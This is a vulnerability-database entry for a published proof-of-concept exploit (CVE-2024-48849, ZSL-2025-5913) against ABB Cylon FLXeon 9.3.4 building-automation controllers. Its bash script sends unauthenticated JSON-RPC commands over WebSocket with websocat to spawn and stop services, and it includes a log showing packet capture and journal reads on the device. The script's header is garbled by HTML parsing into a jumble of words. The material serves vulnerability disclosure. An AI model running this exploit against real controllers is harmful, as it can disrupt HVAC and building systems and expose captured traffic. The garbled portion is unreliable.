ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC

🗓️ 07 Feb 2025 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 334 Views

Vulnerability in ABB Cylon FLXeon 9.3.4 allows DoS via unauthenticated WebSocket command spawning.

Reporter	Title	Published	Views	Family All 13
0day.today	ABB Cylon FLXeon 9.3.4 wsConnect.js WebSocket Command Spawning Exploit	9 Feb 202500:00	–	zdt
BDU FSTEC	The vulnerability of microprogrammed software for programmable logic controllers ABB FBXi, FBVi, FBTi, and CBXi lies in the lack of origin verification in WebSockets. This allows attackers to circumvent security restrictions and gain unauthorized access to protected information.	10 Feb 202500:00	–	bdu_fstec
Circl	CVE-2024-48849	28 Jan 202515:33	–	circl
CNNVD	ABB FLXeon 安全漏洞	29 Jan 202500:00	–	cnnvd
CNVD	ABB FLXeon Security Bypass Vulnerability	17 Feb 202500:00	–	cnvd
CVE	CVE-2024-48849	29 Jan 202518:23	–	cve
Cvelist	CVE-2024-48849 Authentication and Authorization Issues	29 Jan 202518:23	–	cvelist
Exploit DB	ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning	11 Apr 202500:00	–	exploitdb
EUVD	EUVD-2024-43246	3 Oct 202520:07	–	euvd
NVD	CVE-2024-48849	29 Jan 202519:15	–	nvd

<html><body><p>#!/bin/bash
&lt;<eoc .="" .-="" .--="" .---="" ._____="" _="" _.="" ___="" ____="" a="" abb="" advisory="" affected="" air="" allowing="" allows="" amplifying="" an="" and="" are="" as="" aspect="" attack="" attacker="" authentication="" automation="" bacnet="" be="" boilers="" building="" by="" c="" can="" capture="" captures="" cat="" cbt="" cbv="" cbx="" central="" chillers="" command="" command.="" conditions="" connectivity="" continuously="" control="" controller="" controllers="" controllers.="" cooling="" cve="" cve-2024-48849="" cylon="" data="" deliver="" denial="" desc:="" designed="" device="" discovered="" diverse="" drives="" e="" echo="" electrical="" eoc="" eof="" equipment="" execute="" exfiltration.="" exhaustion="" exit="" exploit="" exploited="" express="" fbti="" fbvi="" features="" fi="" field="" filters="" firmware:="" flxeon="" for="" frequency="" functions.="" gjoko="" handling="" heat="" https:="" hvac="" id:="" if="" impact.="" implementation="" in="" instances="" integra="" integration="" intelligent="" interface="" ip="" is="" it="" j="" jsonrpc="" kernel="" krstic="" lack="" leading="" lighting="" linux="" loop="" ltd.="" management="" metering.="" modular="" ms="" multi-zone="" multiple="" network="" new="" nodejs="" o="" of="" on="" on:="" open="" p="" page:="" pid="$!" plant="" poc="" portfolio="" ports="" potential="" processes="" product="" pump="" r="" range="" relevant="" resource="" rooftop="" scalable="" sending="" serial="" series="" service="" services.="" smart="" smartrouter="" solutions.="" spawn="" spawning="" standards="" start="" start_service="`echo" stop_service="`echo" such="" summary:="" systems="" systems.="" t="" target="wss://$IP:443/ws" tcpdump="" tested="" that="" the="" then="" this="" to="" towers="" traffic="" unauthenticated="" unauthorized="" units="" unprecedented="" url:="" users="" uses="" variable="" vendor:="" version:="" volume="" vulnerability="" vulnerable="" web="" websocket="" which="" you="" your="" zsl-2025-5913=""> $START_SERVICE\n"
sleep 1
echo "$START_SERVICE"|
websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v
sleep 2
echo -e "\n[+] Sending JSONRPC =&gt; $STOP_SERVICE\n"
sleep 1
echo "$STOP_SERVICE"|
websocat -k -1 -B 251 -n "$TARGET" -v
echo -e "\n[*] Done"

&lt;&lt; "LOG"
$ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager &gt;log.txt; split -n 4 log.txt
$ cat /usr/local/aam/var/xaa
$ cat /usr/local/aam/var/xab
$ cat /usr/local/aam/var/xac
$ cat /usr/local/aam/var/xad
...
#Apr 21 23:12:51 kernel: device lo left promiscuous mode
#Apr 21 23:12:34 kernel: device lo entered promiscuous mode
#Apr 21 23:12:34 node[196]: ws connect
...
LOG
</eoc></p></body></html>

07 Feb 2025 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 48.8

CVSS 3.19.4

EPSS0.00884

SSVC